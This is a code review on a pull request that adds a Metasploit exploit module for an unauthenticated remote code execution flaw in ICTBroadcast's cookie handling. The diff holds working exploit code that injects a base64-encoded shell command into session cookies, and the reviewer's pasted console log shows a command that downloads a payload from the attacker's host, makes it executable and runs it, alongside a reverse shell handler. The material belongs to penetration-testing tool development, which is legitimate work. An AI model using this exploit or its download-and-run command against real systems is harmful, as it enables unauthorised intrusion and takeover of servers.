modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb

```diff
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ICTBroadcast Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits an unauthenticated remote code execution (RCE) vulnerability
+          in ICTBroadcast. The vulnerability exists in the way session cookies are handled
+          and processed, allowing an attacker to inject arbitrary system commands.
+        },
+        'Author' => [
+          'Valentin Lobstein' # Metasploit module, Vulnerability discovery
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'https://www.ictbroadcast.com/'],
+          ['CVE', '2025-2611']
+        ],
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix/Linux Command Shell',
+            {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2025-03-19',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def get_valid_cookies
+    return @valid_cookies if @valid_cookies
+
+    print_status('Retrieving session cookies dynamically...')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login.php')
+    )
+
+    return [] unless res&.get_cookies
+
+    cookies = res.get_cookies.split('; ').map do |c|
+      key, value = c.split('=', 2)
+      next unless key && value
+
+      Msf::Exploit::Remote::HTTP::HttpCookie.new(key.strip, value.strip)
+    end.compact
+
+    print_status("Found cookies: #{cookies.map(&:to_s).join(', ')}")
+    @valid_cookies = cookies
+  end
+
+  def inject_cookie_payload(command)
+    cookies = get_valid_cookies
+    return if cookies.empty?
+
+    encoded_command = Rex::Text.encode_base64(command)
+    payload = "echo${IFS}#{encoded_command}|base64${IFS}-d|sh"
+
+    updated_cookies = cookies.map do |cookie|
+      "#{cookie.name}=`#{payload}`"
+    end.join('; ')
+
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login.php'),
+      'headers' => { 'Cookie' => updated_cookies }
+    )
+  end
+
+  def check
+    print_status('Checking if target is an ICTBroadcast instance…')
+
+    res = send_request_cgi(
```

Comment:
While testing, I had some issues with `check` method when received 302:
```
msf exploit(linux/http/ictbroadcast_unauth_cookie) > run verbose=true 
[*] Command to run on remote host: curl -so ./wvbyvraaht http://172.17.0.1:8080/6-QSk_1Z4L51LCLriobShA;chmod +x ./wvbyvraaht;./wvbyvraaht&
[*] Fetch handler listening on 172.17.0.1:8080
[*] HTTP server started
[*] Adding resource /6-QSk_1Z4L51LCLriobShA
[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if target is an ICTBroadcast instance…
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
```
I think this might be safer way?
```suggestion
    res = send_request_cgi!(
```